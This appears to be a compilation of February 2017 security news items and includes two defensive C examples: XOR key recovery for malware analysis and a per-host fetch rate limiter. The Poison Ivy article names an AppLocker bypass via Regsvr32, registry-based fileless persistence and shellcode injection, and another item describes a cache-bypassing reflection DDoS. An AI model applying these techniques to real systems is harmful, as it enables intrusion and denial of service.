The Poison Ivy backdoor has been around for several years, targeting organizations all around the world, and was associated with a China-linked threat actor known as menuPass, Stone Panda and APT10. The malware packs capabilities such as key logging, screen and video capture, file transfers, password theft, system administration, traffic relaying, and more.

FireEye didn’t attribute the new campaign to a specific actor, and told SecurityWeek in an email that it can’t make direct connections to a particular group at this time. The security firm said it lacks visibility into what the actors did and admitted it doesn’t know if they were successful. Still, the company did say that “espionage is a reasonable assumption for their motives.”

What the newly observed campaign did show, however, was that the actor behind it is up-to-date with recent social engineering and evasion techniques and isn’t shy when it comes to using them. The attacks leveraged an AppLocker bypass that was publicly revealed last year, as well as fileless execution and persistence, and benign documents to minimize user suspicion of malicious activity.

The malware was distributed via Word documents with malicious macros, and the threat actor was using social engineering to trick users into enabling these macros. The malicious documents were delivered via email, claiming to contain instructions for logging into webmail or information regarding a state law proposal, FireEye explains.

The malicious macros in the documents were designed to invoke Regsvr32, a command-line utility designed for registering DLLs in the registry, to download a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument. This technique was demonstrated last year to effectively bypass AppLocker, the Microsoft application whitelisting solution that prevents unknown executables from running on a system.

In this campaign, the malicious SCT file was designed to invoke WScript to launch PowerShell in hidden mode with an encoded command, FireEye reports. After the PowerShell command is decoded, another layer of PowerShell instructions emerges, serving two purposes: to download a decoy document from the Internet and open it in a second winword.exe process using the Start-Process cmdlet; and to download and run another PowerShell script named f0921.ps1.

The third stage PowerShell script configures an encoded command persistently as a base64 string in the HKCU:\Console\FontSecurity registry key, along with an HKCU\CurrentVersion\Run\SecurityUpdate value to launch the encoded PowerShell payload stored in the previously configured key. Thus, the PowerShell payload is executed every time the user logs in to the system.

A fourth stage PowerShell script in the HKCU\Console\FontSecurity registry borrows from the publicly available Inject-LocalShellCode script from PowerSploit to inject shellcode, researchers explain. The shellcode has a custom XOR-based decryption loop that uses a single byte key (0xD4), and was designed to inject the Poison Ivy backdoor into userinit.exe. The decrypted shellcode also revealed content and configuration related to Poison Ivy.
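One analyst-side step the description above implies, as an added example that is not FireEye's code: given a blob encoded with a single-byte XOR loop, confirm the key by trying all 256 candidates and scoring each result for plaintext likeness, rather than trusting a constant read out of the loader. The sample text, the scoring weights and the 0xD4 key applied to it are constructed for the demo; the routine generalises the single reported key to key recovery for any single-byte XOR blob whose plaintext is mostly text.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

/* Constructed sample: a plausible configuration fragment, not real Poison
 * Ivy data.  It is XOR-encoded at run time with the key the article reports. */
static const char sample_plain[] =
    "PoisonIvy cfg: host=c2.example.invalid port=3460 id=PIVY";
#define SAMPLE_LEN (sizeof sample_plain - 1)
#define SAMPLE_KEY 0xD4

/* Single-byte XOR is its own inverse: the same loop encodes and decodes. */
void xor_buf(uint8_t *dst, const uint8_t *src, size_t n, uint8_t key)
{
    for (size_t i = 0; i < n; i++) dst[i] = src[i] ^ key;
}

/* Plaintext-likeness score: letters, digits and spaces count double, other
 * printable ASCII once, everything else nothing. */
static unsigned text_score(const uint8_t *buf, size_t n)
{
    unsigned s = 0;
    for (size_t i = 0; i < n; i++) {
        uint8_t c = buf[i];
        if ((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
            (c >= '0' && c <= '9') || c == ' ')
            s += 2;
        else if (c >= 0x20 && c < 0x7f)
            s += 1;
    }
    return s;
}

/* Tries all 256 keys on (a prefix of) the blob and returns the one whose
 * output scores highest; ties go to the lowest key.  Returns -1 only if
 * no key produces a single printable byte. */
int recover_xor_key(const uint8_t *enc, size_t n)
{
    uint8_t tmp[256];
    unsigned best = 0;
    int best_key = -1;
    if (n > sizeof tmp) n = sizeof tmp;     /* a prefix is enough to score */
    for (int k = 0; k < 256; k++) {
        xor_buf(tmp, enc, n, (uint8_t)k);
        unsigned s = text_score(tmp, n);
        if (s > best) { best = s; best_key = k; }
    }
    return best_key;
}

/* Encodes the constructed sample, then recovers the key blind; returns the
 * recovered key, or -1 if decoding with it does not restore the text. */
int demo_recovered_key(void)
{
    uint8_t enc[SAMPLE_LEN], dec[SAMPLE_LEN + 1];
    xor_buf(enc, (const uint8_t *)sample_plain, SAMPLE_LEN, SAMPLE_KEY);
    int key = recover_xor_key(enc, SAMPLE_LEN);
    if (key < 0) return -1;
    xor_buf(dec, enc, SAMPLE_LEN, (uint8_t)key);
    dec[SAMPLE_LEN] = '\0';
    return strcmp((const char *)dec, sample_plain) == 0 ? key : -1;
}

int main(void)
{
    int key = demo_recovered_key();
    printf("recovered key: 0x%02X\n", key);
    return key == SAMPLE_KEY ? 0 : 1;
}
```

The scoring is deliberately crude; for a blob whose decrypted content is machine code rather than a config string, a practitioner would swap in a different plausibility test (expected opcode prefixes, a known header) while keeping the same exhaustive 256-key loop.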

“Although Poison Ivy has been a proven threat for some time, the delivery mechanism for this backdoor uses recent publicly available techniques that differ from previously observed campaigns. Through the use of PowerShell and publicly available security control bypasses and scripts, most steps in the attack are performed exclusively in memory and leave few forensic artifacts on a compromised host,” FireEye says.


Out-of-band resource load in Google allows attacker to launch a DDoS attack from its servers
24.2.2017 securityaffairs Attack

A security researcher discovered an Out-of-band resource load flaw in Google’s servers that allowed him to perform a DDoS attack on remote hosts.
Young security researcher Luka Sikic from Croatia found a serious vulnerability in Google. He was able to use the IT giant’s servers to perform a DDoS attack on remote hosts.

Out-of-band resource load (as classified by PortSwigger) is the name for this type of vulnerability, which allows attackers to use vulnerable servers (in this case Google’s) to perform DoS/DDoS attacks on a remote host. Basically, the attacker sends a large number of requests to the vulnerable web application with the target host as the payload; the vulnerable application then reflects every request to the target address chosen by the attacker. PortSwigger rates the severity of this issue as high.

During his test, Sikic was able to generate over 700 Mbps of traffic after 10,000 requests.


However, Google has a caching system that is meant to prevent this type of issue. Sikic was able to bypass that security measure and make the server treat every request as unique.

In his demonstration video, traffic reaches around 300 Mbps, depending on the number of requests per second.

As a mitigation for this issue, there should be a better caching mechanism and a detection system that would not allow an unlimited number of requests to a single remote host.
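One form that mitigation could take, as an added example that is not Google's code: a per-target-host request budget for a server-side fetcher, keyed on the host rather than the full URL so that cache-busting query strings cannot give each request a fresh allowance. The window length, per-window limit and table size are assumed policy values, and the hostnames used are constructed.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <time.h>

#define MAX_HOSTS      64     /* assumed table size */
#define HOST_LEN       128
#define WINDOW_SECONDS 60     /* assumed policy: per-host budget per minute */
#define MAX_PER_WINDOW 100

struct host_bucket {
    char     host[HOST_LEN];
    time_t   window_start;
    unsigned count;
};
static struct host_bucket table[MAX_HOSTS];

void reset_limiter(void) { memset(table, 0, sizeof table); }

/* Extracts the lower-cased host from an http(s) URL, dropping userinfo and
 * port.  Returns 0 on success, -1 for anything that is not a usable URL. */
int url_host(const char *url, char *out, size_t cap)
{
    const char *p;
    if (strncmp(url, "http://", 7) == 0)       p = url + 7;
    else if (strncmp(url, "https://", 8) == 0) p = url + 8;
    else return -1;

    size_t auth = strcspn(p, "/?#");          /* end of the authority part */
    for (size_t i = 0; i < auth; i++)         /* skip user:pass@ if present */
        if (p[i] == '@') { p += i + 1; auth -= i + 1; break; }

    size_t n = 0;
    while (n < auth && p[n] != ':') n++;      /* stop before :port */
    if (n == 0 || n + 1 > cap) return -1;
    for (size_t i = 0; i < n; i++) out[i] = (char)tolower((unsigned char)p[i]);
    out[n] = '\0';
    return 0;
}

/* Returns 1 if a fetch of url may proceed now, 0 if the target host's budget
 * for the current window is spent, the URL is unusable, or the table is full
 * (fail closed: an unknown host gets no free ride when we cannot track it). */
int allow_fetch(const char *url, time_t now)
{
    char host[HOST_LEN];
    if (url_host(url, host, sizeof host) != 0) return 0;

    struct host_bucket *b = NULL, *slot = NULL;
    for (int i = 0; i < MAX_HOSTS; i++) {
        if (table[i].host[0] == '\0') {
            if (!slot) slot = &table[i];
        } else if (strcmp(table[i].host, host) == 0) {
            b = &table[i];
            break;
        } else if (!slot && now - table[i].window_start >= WINDOW_SECONDS) {
            slot = &table[i];                 /* stale entry can be recycled */
        }
    }
    if (!b) {
        if (!slot) return 0;
        b = slot;
        strcpy(b->host, host);                /* host fits: same size as b->host */
        b->window_start = now;
        b->count = 0;
    }
    if (now - b->window_start >= WINDOW_SECONDS) {   /* new window */
        b->window_start = now;
        b->count = 0;
    }
    if (b->count >= MAX_PER_WINDOW) return 0;
    b->count++;
    return 1;
}

/* Issues `attempts` requests to host, each with a different cache-busting
 * query string, and returns how many the limiter let through. */
int count_allowed(const char *host, int attempts, time_t now)
{
    char url[256];
    int allowed = 0;
    for (int i = 0; i < attempts; i++) {
        snprintf(url, sizeof url, "http://%s/page?cb=%d", host, i);
        allowed += allow_fetch(url, now);
    }
    return allowed;
}

int main(void)
{
    reset_limiter();
    printf("allowed %d of 150 requests to target.example\n",
           count_allowed("target.example", 150, 1000));
    return 0;
}
```

Keying on the host is the point: the cache bypass described above works by making every URL look new, and a limiter that counted URLs rather than hosts would be bypassed the same way. A fixed window is simple enough for illustration; a production fetcher would also cap concurrent connections per host and alert when a single caller drives a host to its limit repeatedly.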

This is not the first time Sikic has found a vulnerability in Google’s products. A few months earlier, he found and reported a cross-site scripting issue in YouTube; Google acknowledged the report, and Sikic is already listed in Google’s “Hall of Fame”.

This 17-year-old researcher is already certified by Offensive Security, having obtained his OSCP certification.

Timeline for the Out-of-band resource load is:

February 18 – Bug Reported
February 19 – More information sent
February 20 – Report Triaged
February 22 – Security Issue Confirmed
February 22 – Google update: Issue is already known to Google

UK police arrested the alleged mastermind of the MIRAI attack on Deutsche Telekom
24.2.2017 securityaffairs BotNet

The prosecutor’s office in Cologne and the Federal Criminal Police Office have arrested the alleged mastermind of the MIRAI attack on Deutsche Telekom.
Agents of the UK National Crime Agency (NCA) have arrested a man suspected of involvement in the massive attack on Deutsche Telekom that affected more than 900k routers in November 2016.

The affected routers were used by the Deutsche Telekom customers also for fixed telephony and TV services.

The problems lasted at least two days; the outage began on Sunday, November 27, at around 17:00 local time.

Deutsche Telekom users all over the country were not able to connect online using the routers provided by the company. A graphic representation of the outage was provided by Allestoerungen.de.

The news of the arrest was confirmed by Germany’s Federal Criminal Police Office (BKA).

German police from the city of Cologne identified the suspect and issued the international arrest warrant.

The suspect is a 29-year-old British national; the authorities arrested him at Luton airport, London, on Wednesday. The British police believe the man is the crook who organized the massive attack.

The German police confirmed that the attack was severe and caused serious problems to German citizens. The attackers aimed to recruit the compromised devices in a botnet that was offered for sale on dark web markets.

“The aim of the attack wave should have been to take over the routers and integrate into a bot network operated by the accused. The bot network is supposed to have offered the accused in the Darknet for consideration for arbitrary attack scenarios, such as so-called DDoS attacks.” reads the statement issued by the BKA.

“From the outset, Deutsche Telekom cooperated with law enforcement agencies,” BKA said. “Technical assistance was also provided by the Federal Office for Information Security (BSI) in the analysis of the malicious software used.”

The prosecutors believe the hacker used a modified version of the dreaded Mirai malware to carry out the attack.

The Mirai malware was first spotted by the researcher MalwareMustDie last summer; a botnet of IoT devices compromised by the malicious code was used to shut down the Dyn DNS service.

The BKA confirmed that the UK authorities would extradite the 29-year-old man to Germany to face charges of computer sabotage; the man could be sentenced to up to 10 years in prison.


SHAttered attack, Google and CWI conducted the first SHA-1 collision attack
24.2.2017 securityaffairs Attack

Experts at Google and CWI conducted the first real-world collision attack against the popular SHA-1 hashing algorithm, the so-called SHAttered attack.
Researchers at Google and Centrum Wiskunde & Informatica (CWI) in the Netherlands succeeded in conducting the first real-world collision attack against the popular SHA-1 hashing algorithm.

The researchers created two documents with different content but having the same SHA-1 hashes.

Google and CWI devised a hacking method dubbed ‘SHA-1 shattered’ or ‘SHAttered.’

“We were able to find this collision by combining many special cryptanalytic techniques in complex ways and improving upon previous work. In total the computational effort spent is equivalent to 2^63.1 SHA-1 compressions and took approximately 6,500 CPU years and 100 GPU years,” experts wrote in the research paper.

The SHA-1 algorithm was designed in 1995 by the National Security Agency (NSA) as part of the Digital Signature Algorithm. As we have already explained in the past, hashing functions convert any input message to a string of numbers and letters of fixed length. This string is theoretically unique and is normally used as a cryptographic fingerprint for that message.

If two different messages produce the same digest, we have a collision, and that circumstance opens the door to attackers. A successful collision attack could be exploited to forge digital signatures.

In 2015 a group of researchers demonstrated that the cost of breaking the SHA-1 hash algorithm is lower than previously estimated.

The experts estimated the cost of breaking SHA-1 at between $75,000 and $120,000 using Amazon’s EC2 cloud over a period of a few months.

According to the experts, the SHAttered attack is 100,000 times faster than a brute-force attack; it required nine quintillion (9,223,372,036,854,775,808) computations.

The SHAttered attack was composed of two phases:

the first phase of the attack was run on a heterogeneous CPU cluster hosted by Google and spread across eight physical locations.
the second phase of the attack was run on a heterogeneous cluster of K20, K40 and K80 GPUs hosted by Google.
The monetary cost of computing the second block of the attack by renting Amazon instances can be estimated from these various data. According to the experts, it would cost roughly $560,000 for the necessary 71 device years. It would be more economical for a patient attacker to wait for low “spot prices.”

The experts used two PDF files with different content for their PoC, the two documents had the same SHA-1 hash.


The researchers will release the code of the attack after 90 days.

The experts released a free online tool that scans documents for SHA-1 collisions; it is available on the shattered.io website. Google has already introduced mitigations in both the Gmail and Google Drive services.

I suggest you take a look at this interesting infographic on the SHAttered attack.


Fake offers no longer fly. Scammers are trying a completely new trick

23.2.2017 Novinky/Bezpečnost Hacking
Last year the internet was literally flooded with fake offers of discounts and bargains. Cybercriminals often posed as merchants or representatives of some financial company, luring login credentials from the gullible or trying to infect their computers with a malicious virus. This year, however, they have come up with a far more sophisticated scam. The user is shown nothing but bizarre scribbles.
The national security team CSIRT.CZ, operated by the CZ.NIC association, warned of the new trick.

“A new trick for forcing users to install malware has been observed. In this case the malware is distributed with the help of web pages that display nonsensical characters,” said Pavel Bašta, security analyst at CSIRT.CZ.

Similar characters are often displayed, for example, in text documents when the font used is not installed on the computer. In practice the user then has to install the character set manually in order to read the text.

A virus instead of a new font
And that is exactly what the computer pirates are betting on. “The user is shown a prompt to install a font pack for Google Chrome, with the claim that this will resolve the problem,” Bašta stated.

“If the user falls for the trick, their problems are only beginning, because instead of fonts they install a trojan horse on their computer, or even the Spora ransomware,” the security analyst added, noting that users may encounter similar attacks even on legitimate websites that computer pirates manage to compromise.

They want a ransom
Ransomware is the umbrella term for extortion viruses that have been giving security experts headaches for the past several months. The attacks of these uninvited guests always follow the same precise pattern.

First, the extortion viruses encrypt all data stored on the hard disk. The attackers then demand a ransom for making it accessible again, easily several thousand crowns.

Cybercriminals usually try to give the owner of the attacked machine the impression that they will get their files back after paying a fine, supposedly imposed for using illegal software and the like. That is one reason why many people have already paid the ransom.

Even after paying the ransom, however, users do not get their data back. Instead of paying, the virus has to be removed from the computer. Recovering data that was not backed up is, however, impossible in most cases.

Unreadable web pages, or rather the offer to install a missing font, are just another attempt by cybercriminals to spread extortion viruses.


More than 75% of ransomware comes from Russian-speaking criminals
23.2.2017 Root.cz Viry

At least 47 of the 62 ransomware families discovered in 2016 by Kaspersky Lab experts were developed by Russian-speaking cybercriminals. That is one finding of a survey focused on the Russian-speaking ransomware underground.
Kaspersky Lab found that small groups with limited capabilities are transforming into large formations with the resources and ambition to attack private and corporate targets all over the world.

Crypto-ransomware, a kind of malware that encrypts the victim’s files and demands a ransom to decrypt them, is currently one of the most dangerous types of malware. According to Kaspersky Lab data, more than 1,445,000 users (including businesses) worldwide were hit by this type of malware in 2016, the report says. To better understand the nature of these attacks, Kaspersky Lab compiled an overview of the Russian-speaking illegal community.


Recently there has been a dramatic increase in the number of attacks. The report also looks at why this is happening now, when ransomware has been with us for over a decade. There are said to be three reasons:

It is very easy to buy tools on the black market to build your own ransomware,
it is also possible to buy a service to distribute the extortion code,
thanks to cryptocurrencies, the extortionists’ business model is very simple.
Three cogs in the machine
One of the main findings is that behind the rise of crypto-ransomware attacks over the past few years stands a very adaptable and undemanding ecosystem. It allows criminals to attack with crypto-ransomware regardless of their programming skills and financial resources.

Experts identified three types of involvement in ransomware-related criminal activity:

Creating and improving new ransomware families,
developing and supporting affiliate programs tied to ransomware distribution,
participating in affiliate programs as a partner.
The first type of involvement requires advanced programming knowledge of the participant. Cybercriminals who create new ransomware enjoy the greatest respect in the ransomware underground, because they are the ones who give rise to the key element on which the whole ecosystem stands.

An advertisement offering ransomware with advanced features: strong encryption, anti-emulation techniques, the option of backing up user data…
One level lower in the hierarchy are those behind the development of affiliate programs. This also includes criminal communities that spread ransomware with the help of various tools such as exploit kits or spam.

Affiliate program partners are at the lowest level of the whole system. Using various techniques, they help the owners of the affiliate programs distribute malware in exchange for a share of the ransom. All these members need is determination and a readiness to commit an illegal act, and to enter this “business” a few bitcoins suffice.

Become a partner: the more you earn, the more you keep
Big business, mostly from Russia
By estimates, the total daily revenue of affiliate programs can range from tens to even hundreds of thousands of dollars, of which around 60% remains with the creators themselves as net profit.

While exploring this underground, the experts also identified several large groups of Russian-speaking criminals specializing in developing and distributing crypto-ransomware. These groups can bring together dozens of different partners, each with different programs targeting not only ordinary internet users but also small and medium-sized businesses and even large companies. Originally these groups focused on Russia and the states of the former Soviet Union, but they now show a growing interest in companies in other parts of the world as well.


More than three quarters of individual ransomware families have ties to Russian-speaking groups or individuals. This information comes from forums, command infrastructure and other information available on the internet, the report says. Again there are said to be several reasons: Russia and its surroundings have plenty of experienced programmers and, above all, the local underground already has experience with extortion software.

Even before today’s big wave of cryptocurrency-linked ransomware, between 2009 and 2011 an epidemic of “lockers” appeared in Russian-speaking countries, which made it impossible to use the browser or the whole operating system until the user paid. Back then payment was mostly via premium SMS; today a different payment route has opened up. The model, however, remains the same.

A few big names at the top
Programmers, distributors and partners form a large organization that collectively makes its living from cybercrime. At present there are only a few large ransomware groups in Russian-speaking countries. At the head stands the malware creator, who is also the boss of the whole operation. He writes the attack code itself and its modules, and manages the operating infrastructure.

A manager works with him, whose job is to recruit new partners and support existing ones. Only the manager communicates directly with the creator. The partners, of whom there are several dozen, are then tasked with obtaining the current version of the ransomware and spreading it among victims. They do so with various tools and also through affiliate collaborators, the people on the lowest rung of the ladder. Everyone gets their share of the money earned.


Thousands of dollars a day
According to Kaspersky Lab’s analysis, the income of such a successful group can be in the order of thousands of dollars a day. A professionally organized group, however, also has considerable expenses: it has to update the malware, write modules for it, improve the encryption, add new hiding techniques, monitor the response of antivirus companies and pay the people maintaining the infrastructure. Even so, most of the income, up to 60%, stays in the attackers’ pockets.

Ransomware then spreads mainly by four routes: exploit kits, spam campaigns, social engineering and targeted attacks. The most successful is the use of exploit kits, which cost thousands of dollars a month to rent. The second most successful method is distribution via spam, which usually poses as an important message from the authorities or, say, a bank.

Real e-mail accounts of companies that have already been compromised are also increasingly being abused for attacks. This makes spreading easier, because the new recipient receives mail from a user they actually know and may routinely correspond with. It appears that attackers compromise one company, get into its e-mail system and then send the ransomware to the harvested contacts.

Professional groups are moving to targeted attacks
The analysis also says that attackers are increasingly moving to targeted attacks. Instead of individual users and small organizations, they go after relatively large companies that can be extorted directly for large one-off sums. In one case we saw a targeted attack on a company with 200 computers and another with 1,000 workstations, the report says.

The method used differs fundamentally from earlier approaches: no e-mail campaigns are used, but a targeted attack on the network. First, a vulnerable server belonging to a large company is found. Freely available exploits and tools are used for the attack. If RDP access is open in the network, the attackers use it.

RAT tools such as PUPY and Mimikatz are then used to infect the network. The attackers then study and explore the network, and in the final phase write custom ransomware for it that has never been used anywhere else. The second variant is manual encryption of important files on servers.

According to Kaspersky Lab, attackers are also moving to more sophisticated types of attack because it is a successful business and the groups are very well funded. At the same time, in the case of companies it is possible to cause direct damage by paralysing the whole infrastructure and then demand a large ransom. Experts therefore advise that you definitely do not pay in the event of such an attack. If you do, your money will flow into the ecosystem, and the more money the criminals get, the better access they will have to more sophisticated tools and further opportunities.


Ransomware is installed instead of a Google Chrome font. Attackers spread it even on legitimate websites
23.2.2017 Živě.cz Viry

One of the new routes meant to get malware to its victims was described by Forbes. It targets mainly users of the most widespread browser, Chrome, and most often the user is hit by ransomware, a malicious program that encrypts files. Getting them back is then conditional on paying a ransom.
The current threat uses a well-known trick in which a fake installer for an important add-on is foisted on the user. Usually it is an update of Flash Player or Java that will supposedly allow content on the web to be played. Here, however, the attackers used a new trick: the malware is distributed on a web page with unreadable text, which is supposed to become readable after installing additional fonts. Instead, the user is offered an executable EXE file which, although named Chrome Font v7.51, delivers encrypted data instead of new fonts.

Attackers serve the user a web page with unreadable text, which is supposed to display correctly only after installing a new font. Behind it, of course, hides malware (source: Neosmart)

So if you happen to come across a web page that displays a message like HoeflerText font was not found, definitely do not download the offered file. The browser itself should also warn before installation, but careless users might still decide to install.

Chrome itself should warn with an alert before the dangerous file is downloaded (source: Neosmart)

The greatest danger lies in the method of distribution: the attackers use legitimate websites to which they have gained access.


This Is What Hackers Think of Your Defenses

23.2.2017 securityweek Cyber

Billions of dollars are spent every year on cyber security products; and yet those products continually fail to protect businesses. Thousands of reports analyze breaches and provide reams of data on what happened; but still the picture worsens. A new study takes a different approach; instead of trying to prevent hacking based on what hacking has achieved, it asks real hackers, how do you do it?

The hackers in question are the legal pentesters attending last Summer's DEFCON conference. Seventy were asked about what they do, how they do it, and why they do it -- and the responses are sobering. The resulting report, The Black Report by Nuix, is a fascinating read. It includes sections on the psycho-social origins of cybercrime and a view from law enforcement: but nothing is as valuable as the views from the hackers themselves. These views directly threaten many of the sacred cows of cyber security. They are worth considering: "The only difference between me and a terrorist is a piece of paper [a statement of work] making what I do legal. The attacks, the tools, the methodology; it's all the same."

What they do is surprisingly easy and frighteningly successful. Take sacred cow #1: it takes 250-300 days for the average organization to detect a breach, and the earlier it is detected, the less damage will be done. But there is less time than you think. Eighty-eight percent of the pentesters claim that it takes less than 12 hours to compromise a target; and 80% say it then takes less than another 12 hours to find and steal the data. Even though they are employed, and therefore expected, a third claim their presence is not detected by the security teams they attack. "Data breaches take an average of 250-300 days to detect -- if they're detected at all -- but most attackers tell us they can break in and steal the target data within 24 hours," said Chris Pogue, Nuix CISO and a co-author of the Nuix Black Report. "Organizations need to get much better at detecting and remediating breaches using a combination of people and technology."

Sacred cow #2 could affect the cyber security skills gap. A recent ISACA survey shows that 70% of employers require a security certification before employing new staff. The people they are defending against, however, place little value in those certifications. "Over 75% did not believe technical certifications were an accurate indicator of ability," notes the report. While 4% of the pentesters hoard certifications like bitcoins, holding more than 10, 66% have three or fewer. Clearly, demonstrable ability is more important than paper qualifications -- aptitude testing rather than certificate counting might just close that skills gap.

Sacred cow #3 is that anti-virus and a firewall equate to security. Only 10% of the pentesters admitted to being troubled by firewalls, and a mere 2% by anti-virus. Nevertheless, modern endpoint security is the biggest problem for (that is, the best defense against) hackers, with 36% saying it is an effective countermeasure.

Conversely, this demonstrates that sacred cow #4 remains a sacred cow: "For security decision-makers," says the report, "this result clearly demonstrates the importance of defense in depth rather than relying on any single control. Any individual security control can be defeated by an attacker with enough time and motivation. However, when an organization uses a combination of controls along with security training, education, and processes, the failure of any single control does not automatically lead to data compromise."

It's worth adding, however, that nearly a quarter of the hackers boasted "that no security countermeasures could stop them and that a full compromise was only a matter of time."

When asked what companies should buy to improve their security posture, 37% suggested intrusion detection/prevention systems. Only 6% suggested perimeter defenses. When asked the opposite question (that is, the least effective spend), data hygiene/information governance at 42% is seen as less effective than perimeter defenses at 21%. Somewhat anomalously, penetration testing is seen as the second most effective spend at 25%, and simultaneously the least effective at 4%.

One of the biggest surprises of the survey is that while companies may go to the expense of a penetration test, they will not necessarily act upon the results. "Only 10% of respondents indicated that they saw full remediation of all identified vulnerabilities, and subsequent retesting," notes the report. Indeed, 5% of the respondents saw no remediation whatsoever from their clients -- they were just checking boxes. Seventy-five per cent indicated that there was some remediation, but usually focused on high and critical vulnerabilities.

"While 'fix the biggest problems' appears to be a logical approach to remediation, it misrepresents the true nature of vulnerabilities and provides a false sense of security for decision makers," warns the report. "If you only address specific vulnerabilities that you have chosen arbitrarily and devoid of context, it's the cybersecurity equivalent of taking an aspirin for a brain tumor; you are addressing a symptom as opposed to the root cause."

Of course, this failure to fully remediate may be a side-effect of compliance. Elsewhere in the survey, 30% of the pentesters felt they were employed for compliance purposes only: "We have to deal with security for compliance reasons, nothing more." This resonates with the suggestion that the companies that did zero remediation were 'just ticking boxes' -- it is the hidden danger within the growing number of penetration testing compliance requirements.

The real value of this survey is that it can make security decision makers question what security vendors tell them. The purpose of security software is first and foremost to be sold, and only then to do what it says on the box. By looking at how professional hackers work, security teams are in a better position to plug the gaps effectively rather than just buying the latest technicolor product.


Android Ransomware Demands Victims Speak Unlock Code

23.2.2017 securityweek Android

A newly discovered Android ransomware variant that packs speech recognition capabilities demands that victims speak a code provided by the attackers to unlock their devices, Symantec warns.

Dubbed Android.Lockdroid.E, the malware has been targeting Android users for over a year, but appears to be under development still, as its author is testing out various capabilities. In addition to locking devices, the new variant leverages speech recognition APIs to determine whether the user has provided it with the necessary passcode to unlock the device.

Most ransomware would ask users to type a passcode to regain access to their smartphone, but Android.Lockdroid.E’s author is experimenting with additional capabilities, Symantec’s Dinesh Venkatesan reveals. Targeting Chinese speakers at the moment, the malware can lock the user out using a SYSTEM type window, after which it displays a ransom note.

Written in Chinese, the note provides users with instructions on how to unlock the device, and also includes a QQ instant messaging ID that users should contact to receive further instructions on how to pay the ransom. However, since the device is already locked, users need a second device to contact the cybercriminals behind the threat and receive an unlock code.

Additionally, the ransom note instructs the victim to press a button to launch the speech recognition functionality. The malware abuses third-party speech recognition APIs for this function, and compares the spoken words heuristically with the expected passcode. The lockscreen is removed if the input matches.

“For some cases, the recognized words are normalized to accommodate any small degree of inaccuracies that an automated speech recognizer is bound to,” Symantec’s researcher explains.

The image used for the lockscreen, as well as the passcode information are stored in the malware’s assets files, in encoded form with additional padding. The researcher managed to extract the passcode using an automated script and says that the threat uses different types of passcodes. In fact, a different passcode is used for each infection.

A previously discovered Android.Lockdroid.E variant was using an inefficient 2D barcode ransom demand, which also required users to have a second device for scanning purposes, thus making it difficult for users to pay the ransom. The new variant doesn’t get any better, as it too requires a second device to contact the cybercriminals.

“While analyzing these latest Android.Lockdroid.E variants, I observed several implementation bugs such as improper speech recognition intent firing and copy/paste errors. It’s clear that the malware authors are continually experimenting with new methods to achieve their goal of extorting money from their victims. We can be certain this isn’t the last trick we’ll see from this threat family,” Venkatesan notes.

As always, users are advised to keep their software up to date and refrain from downloading applications from unfamiliar websites, but use only trusted sources for these operations. Further, users should pay attention to the permissions requested by apps, should keep their data backed up, and should install a suitable mobile security app for additional protection.


Netflix Releases Open Source Security Tool "Stethoscope"

23.2.2017 securityweek Security
Netflix this week released Stethoscope, an open source web application that gives users specific recommendations for securing their computers, smartphones and tablets.

Stethoscope was developed by Netflix as part of its “user focused security” approach, which is based on the theory that it is better to provide employees actionable information and low-friction tools, rather than relying on heavy-handed policy enforcement.

Netflix believes employees are more productive when they don’t have to deal with too many rules and processes. That is why Stethoscope scans their devices and provides recommendations on security measures that should be taken, but allows them to perform the tasks on their own time.

Stethoscope analyzes a device’s disk encryption, firewall, automatic updates, operating system and software updates, screen lock, jailbreaking or rooting, and installed security software. Each of these factors is attributed a rating based on its importance.


Stethoscope was developed in Python (backend) and React (frontend), and it does not have its own data store. Data sources are implemented as plugins, allowing users to add new inputs.

For the time being, the application supports LANDESK for Windows computers, JAMF for Macs and Google MDM for mobile devices. However, Netflix wants to extend the list of data sources and Facebook’s Osquery is first on the list.

The modular architecture allows users to add new security checks and other functionality by developing plugins.

The Stethoscope source code, along with instructions for installation and configuration, are available on GitHub. Netflix has invited users to contribute to the tool, particularly with new plugins.

Stethoscope is not the only open source security tool released by Netflix. The company has made available the source code for several of the applications it uses, including the XSS discovery framework Sleepy Puppy, and the threat monitoring tools Scumblr and Sketchy.


Code Execution Flaw Affected Linux Kernel Since 2005

23.2.2017 securityweek Vulnerebility
A researcher has discovered a serious locally exploitable vulnerability that appears to have been around in the Linux kernel for more than 11 years. The flaw has been addressed in the kernel and Linux distributions are working on releasing patches.

The weakness, a double-free vulnerability tracked as CVE-2017-6074, was discovered by Google software engineering intern Andrey Konovalov using syzkaller, an open source Linux fuzzer developed by the tech giant.

The flaw affects the Datagram Congestion Control Protocol (DCCP) implementation for Linux since the release of version 2.6.14 in October 2005. In fact, this was the first kernel version to include support for DCCP.

According to the researcher, the vulnerability allows an unprivileged process to execute arbitrary code within the kernel. Affected Linux distributions said the flaw can be exploited for privilege escalation or denial-of-service (DoS) attacks.

“A flaw was found in the Linux kernel’s implementation of the DCCP protocol in which a local user could create influence timing in which a [socket buffer] could be used after it had been freed by the kernel,” explained Gentoo developer Thomas Deutschmann. “An attacker who is able to craft structures allocated in this free memory will be able to create memory corruption, privilege escalation or crash the system.”

The vulnerability was reported to Linux kernel developers on February 15 and a fix was released within two days. Linux distributions were informed about the flaw on February 18 and they are working on patches.

Fixes have already been released for Ubuntu, and Red Hat has informed users that the exploit can be mitigated using recent versions of SELinux.

Konovalov says he will make a proof-of-concept (PoC) exploit available after users have had a chance to update their installations.


These Were the Top Threats Targeting Healthcare Firms in Q4 2016

23.2.2017 securityweek Cyber
Healthcare is a consistent target for cybercriminals, with IBM's 2016 Cyber Security Intelligence Index claiming it had become the single most attacked industry. Today FortiGuard Labs has released details on the top 5 methods used to attack healthcare in Q4, 2016.

The research draws on telemetry gathered from 454 healthcare companies in 50 different countries. It outlines the top five threats detected in malware, ransomware, mobile malware, IPS events, botnets, and exploit kits.

The top malware threat comes from VBS/Agent.LKY!tr with more than 85,000 detections. This is best known as the initial attack vector for a ransomware attack. The second most prevalent malware is Riskware/Asparnet, with close to 78,000 detections. This is usually installed unintentionally, and is designed to collect sensitive information.

Unsurprisingly, given the size of the ransomware threat to the healthcare industry, four of the top five malware threats have a ransomware connection. The remaining three are VBS/Agent.97E!tr (31,000 detections), JS/Nemucod.BQM!tr (30,000 detections), and JS/Nemucod.76CD!tr.dldr (28,000 detections).

